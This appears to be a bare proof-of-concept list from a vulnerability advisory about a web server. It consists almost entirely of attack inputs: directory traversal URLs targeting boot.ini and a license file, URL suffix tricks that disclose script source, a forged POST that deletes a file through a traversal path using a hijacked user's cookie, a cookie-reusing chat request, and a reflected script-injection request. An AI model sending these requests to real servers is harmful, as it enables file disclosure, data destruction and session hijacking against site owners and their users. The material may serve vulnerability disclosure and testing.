A]
http://www.example.com/\..\..\..\boot.ini
http://www.example.com/%80..\..\..\boot.ini
http://www.example.com/%ff..\bdlicense.dat

B]
http://www.example.com/lua.lsp+
http://www.example.com/lua.lsp.
http://www.example.com/lua.lsp%80

C]
POST /drive/c/bdusers/USER/?cmd=rm HTTP/1.1
Host: www.example.com
Cookie: "use the real user's cookie!"
Content-Type: application/x-www-form-urlencoded
Content-Length: 21

dir=..\..\..\file.txt

D]
POST /eh/chat.ehintf/C. HTTP/1.1
Host: www.example.com
Content-Type: text/plain
Content-Length: 0
Cookie: "use the real user's cookie!"

E]
GET <script>alert('hello');</script> HTTP/1.0